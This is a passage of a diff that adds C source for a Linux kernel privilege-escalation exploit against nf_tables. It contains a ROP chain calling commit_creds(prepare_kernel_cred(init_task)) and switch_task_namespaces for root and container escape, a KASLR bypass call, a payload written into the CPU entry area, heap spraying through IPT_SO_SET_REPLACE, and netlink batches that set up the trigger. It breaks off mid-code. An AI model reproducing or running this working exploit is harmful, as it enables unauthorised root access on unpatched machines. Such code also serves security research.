+// This rule then has 4 expressions which will run our payload.
+struct payload {
+    // This is provided by struct xt_table_info->size
+    #if 0
+    // blob size
+    u64 size;
+    #endif
+
+    //
+    // note that we omit a hole of ~60 bytes which is all zero
+    //
+
+    // rule data (1 rule)
+    u64 is_last:1, dlen:12, handle:42;
+
+    // We use these to set up the regs argument passed to our following fake_expr in RSI.
+    // Essentially these exprs will copy data from the packet into the regs.
+    // We need it for our stack pivot.
+    struct {
+        u64 fast_ops;
+        u8 base;
+        u8 offset;
+        u8 len;
+        u8 dreg;
+        u32 __padding;
+    } __attribute__((__packed__)) fast_exprs[3] __attribute__((aligned(__alignof__(u64))));
+
+    // Actual call into our rop chain
+    struct {
+        u64 fake_ops;
+        u64 rop_chain[128];
+    } fake_expr;
+};
+
+static u32 rop_chain_rsi[6] = {};
+static struct payload payload = {};
+
+void setup_registers(struct payload* payload) {
+    // this function sets up the part of the payload which initializes the
+    // nft_regs structure in nft_do_chain.
+    // essentially we copy a stack pivot gadget into the regs;
+    // the data will be copied directly from the packet we send to trigger the payload
+
+    *(u64*)((u8*)rop_chain_rsi + 0xF) = pop_rsp_add_rsp_0x20_pop_rbx;
+
+    const u32* regs = rop_chain_rsi;
+    int j = 0;
+    for (int i = 0; i < 6; i++) {
+        if (regs[i] == 0) {
+            continue;
+        }
+
+        payload->fast_exprs[j].fast_ops = nft_payload_fast_ops;
+        payload->fast_exprs[j].base = NFT_PAYLOAD_NETWORK_HEADER;
+        // offset of our skb payload data
+        payload->fast_exprs[j].offset = 0x1c + i * 4;
+        payload->fast_exprs[j].len = 4;
+        payload->fast_exprs[j].dreg = i;
+
+        j++;
+    }
+
+    #if 0
+    payload->size = sizeof(struct payload) - 8; // offsetof(struct payload, is_last);
+    #endif
+    payload->is_last = 0;
+    payload->dlen = sizeof(struct payload) - offsetof(struct payload, fast_exprs);
+    payload->handle = 0xDEAD;
+}
+
+void setup_rop_chain(struct payload* payload) {
+    payload->fake_expr.fake_ops = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);
+
+    // the top of the stack contains &payload->fake_expr;
+    // we jump into this using this gadget:
+    // pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret;
+
+    u64* rop_chain = payload->fake_expr.rop_chain;
+    int i = 0x20 / 8;
+
+    // had some issues with object boundaries. Let's get some more stack space ..
+    rop_chain[i++] = add_rsp_0x88;
+    i += 0x88 / 8;
+    rop_chain[i++] = add_rsp_0x88;
+    i += 0x88 / 8;
+    rop_chain[i++] = add_rsp_0x88;
+    i += 0x88 / 8;
+    rop_chain[i++] = add_rsp_0x88;
+    i += 0x88 / 8;
+    #if 0
+    rop_chain[i++] = add_rsp_0x88;
+    i += 0x88 / 8;
+    rop_chain[i++] = add_rsp_0x88;
+    i += 0x88 / 8;
+    rop_chain[i++] = add_rsp_0x88;
+    i += 0x88 / 8;
+    rop_chain[i++] = add_rsp_0x88;
+    i += 0x88 / 8;
+    #endif
+
+    rop_chain[i++] = pop_rdi;
+    rop_chain[i++] = init_task;
+    rop_chain[i++] = prepare_kernel_cred;
+
+    rop_chain[i++] = mov_rdi_rax;
+    rop_chain[i++] = commit_creds;
+
+    rop_chain[i++] = pop_rdi;
+    rop_chain[i++] = 1;
+    rop_chain[i++] = find_task_by_vpid;
+
+    rop_chain[i++] = mov_rdi_rax;
+    rop_chain[i++] = pop_rsi;
+    rop_chain[i++] = init_nsproxy;
+    rop_chain[i++] = switch_task_namespaces;
+
+    // prepare to restore execution
+    // nft_do_chain:
+    // entry:
+    //   sub rsp, 0x220
+    //   lea r12, [rsp+0x48]
+    // exit:
+    //   ffffffff81e517eb: 89 d0  mov %edx,%eax
+    rop_chain[i++] = pop_rbp;
+    rop_chain[i++] = 0x220 - 0x48;
+    rop_chain[i++] = lea_rax_r12_plus_rbp_pop5;
+    i += 5;
+
+    // prepare the stack restore gadget
+    rop_chain[i++] = pop_rcx;
+    rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, pop_rsp_jmp_rsi_0xf);
+
+    // prepare the return jmp gadget
+    rop_chain[i++] = pop_rsi;
+    rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_do_chain_leave) - 0xf;
+
+    // set up the return value
+    rop_chain[i++] = pop_rdx;
+    rop_chain[i++] = NF_DROP;
+
+    // actually restore execution
+    rop_chain[i++] = push_rax_jmp_rcx;
+}
+
+static struct nlmsghdr* begin_batch_chunk(struct nlmsghdr* nlh) {
+    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len);
+    return nlmsg_end(nlh);
+}
+
+static void end_batch_chunk(struct nlmsghdr* batch, struct nlmsghdr* nlh) {
+    batch->nlmsg_len += nlh->nlmsg_len;
+}
+
+static void add_verdict_data(struct nlattr* attr, u16 type, u32 code, ...)
{ + va_list ap; + va_start(ap, code); + + struct nlattr* data = netlink_attr_nest_begin(attr, type); + + struct nlattr* verdict = netlink_attr_nest_begin(data, NFTA_DATA_VERDICT); + netlink_attr_append(verdict, NFTA_VERDICT_CODE, &code, sizeof(code)); + + while (1) { + u16 t = va_arg(ap, u32); + if (!t) { + break; + } + + void* data = va_arg(ap, void*); + size_t size = va_arg(ap, size_t); + + netlink_attr_append(verdict, t, data, size); + } + + netlink_attr_nest_end(data, verdict); + netlink_attr_nest_end(attr, data); + +} + +int ip_link_set_flags(int s, int ifindex, unsigned int ifi_flags) { + u8 buf[1024] = {0}; + struct nlmsghdr* nlh = (void*)buf; + + struct ifinfomsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->ifi_family = PF_UNSPEC; + data->ifi_type = 0; + data->ifi_index = ifindex; + data->ifi_flags = ifi_flags;// IFF_UP; + data->ifi_change = 1; + + FAIL_IF(netlink_send(s, nlh) < 0); + FAIL_IF(netlink_recv(s, nlh, sizeof(buf)) < 0); + FAIL_IF(netlink_errno(nlh) != 0); + return 0; +} + +static void sig_handler(int s) {} + +static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) { + asm volatile ( + "mov %0, %%rsp\n" + "pop %%r15\n" + "pop %%r14\n" + "pop %%r13\n" + "pop %%r12\n" + "pop %%rbp\n" + "pop %%rbx\n" + "pop %%r11\n" + "pop %%r10\n" + "pop %%r9\n" + "pop %%r8\n" + "pop %%rax\n" + "pop %%rcx\n" + "pop %%rdx\n" + "pop %%rsi\n" + "pop %%rdi\n" + "divq (0x1234000)\n" + "1:\n" + "jmp 1b\n" + : : "r"(payload) + ); + __builtin_unreachable(); +} + +// Fill the CPU entry area exception stack of HELPER_CPU with a +// struct cpu_entry_area_payload +static void setup_cpu_entry_area() { + if (fork()) { + return; + } + + struct cpu_entry_area_payload payload = {}; + payload.nft_expr_eval = push_rdi_jmp_rsi_0xf; + payload.pop_rsp_jmp_rsi_0xf = pop_rsp_jmp_rsi_0xf; + payload.nft_do_chain_leave = nft_do_chain_leave; + + PANIC_IF(_pin_to_cpu(HELPER_CPU) < 0); + PANIC_IF(signal(SIGFPE, sig_handler) == SIG_ERR); + PANIC_IF(signal(SIGTRAP, sig_handler) == SIG_ERR); + PANIC_IF(signal(SIGSEGV, sig_handler) == SIG_ERR); + PANIC_IF(setsid() == -1); + + write_cpu_entry_area(&payload); +} + + +static void* payload_page = NULL; + +int spray_payload(int fd) { + struct ipt_replace replace = {}; + // into dyn-kmalloc-8k-cg please + replace.size = 0x1000 + 1; + // need this to make the allocation + replace.num_counters = 1; + + memcpy(payload_page, &replace, sizeof(replace)); + _Static_assert(sizeof(replace) + sizeof(payload) <= 0x1000, "payload does not fit into one page"); + memcpy(payload_page + sizeof(replace), &payload, sizeof(payload)); + + // int fd = socket(AF_INET, SOCK_STREAM, 0); + + for (int i = 0; i < 8; i++) { + // this faults during the copy_from_user_call, immediately frees our payload again, + // but that is enough for us + if (setsockopt(fd, SOL_IP, IPT_SO_SET_REPLACE, payload_page, 0x1000 * 2) == 0 || errno != EFAULT) { + printf("spray payload: setsockopt(): unexpected error?\n"); + return -1; + } + } + + return 0; +} + +#define BUF_SIZE (1024*8) +static int send_check(int fd, struct nlmsghdr* batch) { + u32 total_len = batch->nlmsg_len; + if (total_len > BUF_SIZE) { + printf("message too large: %u\n", total_len); + abort(); + } + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(struct nfgenmsg); + + FAIL_IF(__netlink_send(fd, batch, total_len) < 0); + FAIL_IF(netlink_recv(fd, batch, BUF_SIZE) < 0); + + return 
netlink_errno(batch); +} + +u64 get_jiffies() { + return times(NULL) * 10; +} + + +void sandbox() { + PANIC_IF(_pin_to_cpu(MAIN_CPU) < 0); + PANIC_IF(unshare(CLONE_NEWUSER | CLONE_NEWNET)); + + int s; + PANIC_IF((s = netlink_open(NETLINK_ROUTE)) < 0); + PANIC_IF(ip_link_set_flags(s, 1 /* if_nametoindex("lo") */, IFF_UP)); + close(s); +} + +int main(int argc, char *argv[]) { + printf("Hello World!\n"); + sandbox(); + + if (argc > 1) { + u64 base = strtoull(argv[1], NULL, 16); + bypass_kaslr(base); + } else { + bypass_kaslr(0); + } + + // prepare all the payloads and the processes using them + setup_registers(&payload); + setup_rop_chain(&payload); + + // fd to spray payloads + int spray_fd; + FAIL_IF((spray_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0); + // mmap an isolated page which will fault when over-read + payload_page = mmap((void*)0xAAAAA000, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); + FAIL_IF(payload_page == MAP_FAILED); + + // fd to trigger payload + int s; + FAIL_IF((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0); + struct sockaddr_in dst = {}; + dst.sin_port = 9999; + inet_aton("127.0.0.1", &dst.sin_addr); + + // now a large portion of nf_tables setup code, will do the following: + // table MY_TABLE + // set MY_SET + // + // chain JUNK + // return + // + // [ MAX_NUM_JUNK_OPS times ] + // set junk SJ_x + // [ NUM_ELEMS_JUNK_SET times ] + // verdict JUMP chain JUNK + // + // chain A (basechain) + // JUMP chain B (1 use) + // chain B + // RETURN + // [ many chunk rules, to prepare for > 0x1000 allocation ] + // + // eventually we will add one additional verdict to MY_SET: + // set MY_SET + // verdict JUMP chain B (1 use) + // + // mostly noise, read comments for key information + int nfd; + FAIL_IF((nfd = netlink_open(NETLINK_NETFILTER)) < 0); + + u8* buf; + FAIL_IF((buf = calloc(BUF_SIZE, 1)) == NULL); + + printf("1) setup table, victim set and a bunch of junk sets\n"); + struct nlmsghdr* batch = (void*)buf; + + struct nfgenmsg* data = NLMSG_DATA(batch); + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Create a new table + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_TABLE_NAME, MY_TABLE); + + end_batch_chunk(batch, nlh); + } + { + // Create a new set + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + const u32 keylen = htonl(MY_KEY_LEN); + netlink_attr_put(nlh, NFTA_SET_KEY_LEN, &keylen, sizeof(keylen)); + + // need NFT_SET_MAP in order to place verdict + // need NFT_SET_TIMEOUT in order to allow elements to expire + const u32 flags = htonl(NFT_SET_MAP | NFT_SET_TIMEOUT); + netlink_attr_put(nlh, NFTA_SET_FLAGS, &flags, sizeof(flags)); + + // we want to place verdict data, please + const u32 type = 
htonl(NFT_DATA_VERDICT); + netlink_attr_put(nlh, NFTA_SET_DATA_TYPE, &type, sizeof(type)); + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, MY_SET); + + const u32 id = htonl(0xAABBCCDD); + netlink_attr_put(nlh, NFTA_SET_ID, &id, sizeof(id)); + + end_batch_chunk(batch, nlh); + } + + // create a bunch of junk sets + for (int i = 0; i < MAX_NUM_JUNK_OPS; i++) { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + const u32 keylen = htonl(MY_KEY_LEN); + netlink_attr_put(nlh, NFTA_SET_KEY_LEN, &keylen, sizeof(keylen)); + + // need NFT_SET_MAP in order to place verdict + const u32 flags = htonl(NFT_SET_MAP | NFT_SET_CONCAT); + netlink_attr_put(nlh, NFTA_SET_FLAGS, &flags, sizeof(flags)); + + // we want to place verdict data, please + const u32 type = htonl(NFT_DATA_VERDICT); + netlink_attr_put(nlh, NFTA_SET_DATA_TYPE, &type, sizeof(type)); + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + + const u16 name = generate_set_name(i); + netlink_attr_put(nlh, NFTA_SET_NAME, &name, sizeof(name)); + + const u32 id = htonl(0xFF000000 | i); + netlink_attr_put(nlh, NFTA_SET_ID, &id, sizeof(id)); + + const u32 policy = htonl(NFT_SET_POL_MEMORY); + netlink_attr_put(nlh, NFTA_SET_POLICY, &policy, sizeof(policy)); + + struct nlattr* n = netlink_nest_begin(nlh, NFTA_SET_DESC); + + // Need to set NFTA_SET_DESC_SIZE in order to select some other than rhash map type + // This is not needed, but this makes the execution paths clearer should one decide to debug + // things + const u32 size = htonl(NUM_ELEMS_JUNK_SET); + netlink_attr_append(n, NFTA_SET_DESC_SIZE, &size, sizeof(size)); + + struct nlattr* nn = netlink_attr_nest_begin(n, NFTA_SET_DESC_CONCAT); + + // create one field + const u32 len = htonl(MY_KEY_LEN); + + struct nlattr* el = netlink_attr_nest_begin(nn, NFTA_LIST_ELEM); + netlink_attr_append(el, NFTA_SET_FIELD_LEN, &len, sizeof(len)); + netlink_attr_nest_end(nn, el); + + el = netlink_attr_nest_begin(nn, NFTA_LIST_ELEM); + netlink_attr_append(el, NFTA_SET_FIELD_LEN, &len, sizeof(len)); + netlink_attr_nest_end(nn, el); + + netlink_attr_nest_end(n, nn); + netlink_nest_end(nlh, n); + + end_batch_chunk(batch, nlh); + } + + { + // Create a new junk chain, chain J. We use it as a target for our verdicts. + // just to make sure that transactions will do a lot of actual work. 
+ struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWCHAIN; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_CHAIN_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_CHAIN_NAME, CHAIN_JUNK); + + const u32 flags = htonl(0); + netlink_attr_put(nlh, NFTA_CHAIN_FLAGS, &flags, sizeof(flags)); + + end_batch_chunk(batch, nlh); + } + + { + // Add a new rule RETURN to chain J: + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWRULE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_RULE_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_RULE_CHAIN, CHAIN_JUNK); + + struct nlattr* exprs = netlink_nest_begin(nlh, NFTA_RULE_EXPRESSIONS); + + struct nlattr* el = netlink_attr_nest_begin(exprs, NFTA_LIST_ELEM); + + netlink_attr_append(el, NFTA_EXPR_NAME, "immediate", strlen("immediate")); + struct nlattr* expr_data = netlink_attr_nest_begin(el, NFTA_EXPR_DATA); + + add_verdict_data(expr_data, NFTA_IMMEDIATE_DATA, htonl(NFT_RETURN), 0); + + const u32 dreg = htonl(NFT_REG_VERDICT); + netlink_attr_append(expr_data, NFTA_IMMEDIATE_DREG, &dreg, sizeof(dreg)); + + netlink_attr_nest_end(el, expr_data); + netlink_attr_nest_end(exprs, el); + + netlink_nest_end(nlh, exprs); + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) != 0) { + perror("netlink_send()"); + return -1; + } + + printf("2) fill junk sets\n"); + + for (int i = 0; i < MAX_NUM_JUNK_OPS; i++) { + const u16 set_name = generate_set_name(i); + + // fill each set with NUM_ELEMS_JUNK_SET elements + for (int j = 0; j < NUM_ELEMS_JUNK_SET / NUM_ELEMS_PER_BATCH; j++) { + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + for (int k = 0; k < NUM_ELEMS_PER_BATCH; k++) { + // Insert verdict JUMP chain J into the set + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_ELEM_LIST_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_ELEM_LIST_SET, &set_name, sizeof(set_name)); + + struct nlattr* list = netlink_nest_begin(nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + + // not sure why we need this nesting .. 
+ struct nlattr* el = netlink_attr_nest_begin(list, 0xFFFF); + + const u32 flags = htonl(0); + netlink_attr_append(el, NFTA_SET_ELEM_FLAGS, &flags, sizeof(flags)); + + add_verdict_data(el, NFTA_SET_ELEM_DATA, htonl(NFT_JUMP), NFTA_VERDICT_CHAIN, CHAIN_JUNK, 0); + + struct nlattr* key = netlink_attr_nest_begin(el, NFTA_SET_ELEM_KEY); + + u8 key_data[MY_KEY_LEN] = {}; + _Static_assert(MY_KEY_LEN >= 3, ""); + key_data[0] = 0x41; + key_data[1] = j+1; + key_data[2] = k+1; + + netlink_attr_append(key, NFTA_DATA_VALUE, key_data, sizeof(key_data)); + + netlink_attr_nest_end(el, key); + netlink_attr_nest_end(list, el); + netlink_nest_end(nlh, list); + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) != 0) { + perror("netlink_send()"); + return -1; + } + } + } + + printf("3) setup primitives\n"); + + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Create a new chain, chain A, our base chain + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWCHAIN; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_CHAIN_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_CHAIN_NAME, CHAIN_A); + + const u32 flags = htonl(NFT_CHAIN_BASE); + netlink_attr_put(nlh, NFTA_CHAIN_FLAGS, &flags, sizeof(flags)); + + struct nlattr* hook = netlink_nest_begin(nlh, NFTA_CHAIN_HOOK); + + const u32 hooknum = htonl(NF_INET_LOCAL_IN); + const u32 priority = htonl(0); + netlink_attr_append(hook, NFTA_HOOK_HOOKNUM, &hooknum, sizeof(hooknum)); + netlink_attr_append(hook, NFTA_HOOK_PRIORITY, &priority, sizeof(priority)); + + netlink_nest_end(nlh, hook); + + end_batch_chunk(batch, nlh); + } + + { + // Create a new chain, chain B + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWCHAIN; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_CHAIN_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_CHAIN_NAME, CHAIN_B); + + const u32 flags = htonl(0); + netlink_attr_put(nlh, NFTA_CHAIN_FLAGS, &flags, sizeof(flags)); + + end_batch_chunk(batch, nlh); + } + + { + // Add a new rule RETURN to chain B: + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWRULE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_RULE_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_RULE_CHAIN, CHAIN_B); + + struct nlattr* exprs = 
netlink_nest_begin(nlh, NFTA_RULE_EXPRESSIONS); + + struct nlattr* el = netlink_attr_nest_begin(exprs, NFTA_LIST_ELEM); + + netlink_attr_append(el, NFTA_EXPR_NAME, "immediate", strlen("immediate")); + struct nlattr* expr_data = netlink_attr_nest_begin(el, NFTA_EXPR_DATA); + + add_verdict_data(expr_data, NFTA_IMMEDIATE_DATA, htonl(NFT_RETURN), 0); + + const u32 dreg = htonl(NFT_REG_VERDICT); + netlink_attr_append(expr_data, NFTA_IMMEDIATE_DREG, &dreg, sizeof(dreg)); + + netlink_attr_nest_end(el, expr_data); + netlink_attr_nest_end(exprs, el); + + netlink_nest_end(nlh, exprs); + + end_batch_chunk(batch, nlh); + } + + { + // Add a new rule JUMP chain B to chain A: + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWRULE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_RULE_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_RULE_CHAIN, CHAIN_A); + + struct nlattr* exprs = netlink_nest_begin(nlh, NFTA_RULE_EXPRESSIONS); + + struct nlattr* el = netlink_attr_nest_begin(exprs, NFTA_LIST_ELEM); + + netlink_attr_append(el, NFTA_EXPR_NAME, "immediate", strlen("immediate")); + struct nlattr* expr_data = netlink_attr_nest_begin(el, NFTA_EXPR_DATA); + + add_verdict_data(expr_data, NFTA_IMMEDIATE_DATA, htonl(NFT_JUMP), NFTA_VERDICT_CHAIN, CHAIN_B, 0); + + const u32 dreg = htonl(NFT_REG_VERDICT); + netlink_attr_append(expr_data, NFTA_IMMEDIATE_DREG, &dreg, sizeof(dreg)); + + netlink_attr_nest_end(el, expr_data); + netlink_attr_nest_end(exprs, el); + + netlink_nest_end(nlh, exprs); + + end_batch_chunk(batch, nlh); + } + + // Now we need to blow up chain B, the allocation needs to be larger than 4096. + // We will simply add NFT_CONTINUE immediate expressions, for no specific reason. + // Total size of our allocation will be NUM_RULES * (8 + NUM_EXPR * SIZEOF(EXPR)). 
+ // With immediate expressions SIZEOF(EXPR) == 32 + // Choose NUM_EXPR = 16 + // We need an allocation > 4096 bytes, thus we need at least 4096 / (8 + 512) = 8 rules + for (int i = 0; i < 8; i++) + { + // Add a new rule CONTINUE to chain B: + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWRULE; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_RULE_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_RULE_CHAIN, CHAIN_B); + + struct nlattr* exprs = netlink_nest_begin(nlh, NFTA_RULE_EXPRESSIONS); + + // Add some dummy expressions, just to increase rule size + for (int j = 0; j < 16; j++) { + struct nlattr* el = netlink_attr_nest_begin(exprs, NFTA_LIST_ELEM); + netlink_attr_append(el, NFTA_EXPR_NAME, "immediate", strlen("immediate")); + struct nlattr* expr_data = netlink_attr_nest_begin(el, NFTA_EXPR_DATA); + + add_verdict_data(expr_data, NFTA_IMMEDIATE_DATA, htonl(NFT_CONTINUE), 0); + + const u32 dreg = htonl(NFT_REG_VERDICT); + netlink_attr_append(expr_data, NFTA_IMMEDIATE_DREG, &dreg, sizeof(dreg)); + + netlink_attr_nest_end(el, expr_data); + netlink_attr_nest_end(exprs, el); + } + + netlink_nest_end(nlh, exprs); + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) != 0) { + perror("netlink_send()"); + return -1; + } + + printf("setup complete.\n"); + + // wait for RCU for good measure + sleep(1); + + printf("sampling jiffies ..\n"); + + #define NUM_SAMPLES 5 + u64 t_delta = 0; + + for (int num_samples = 0; num_samples < NUM_SAMPLES; num_samples++) { + u64 t_begin = get_jiffies(); + u64 t_end = 0; + + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Delete the victim set. This will decrease reference counters for all elements + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct 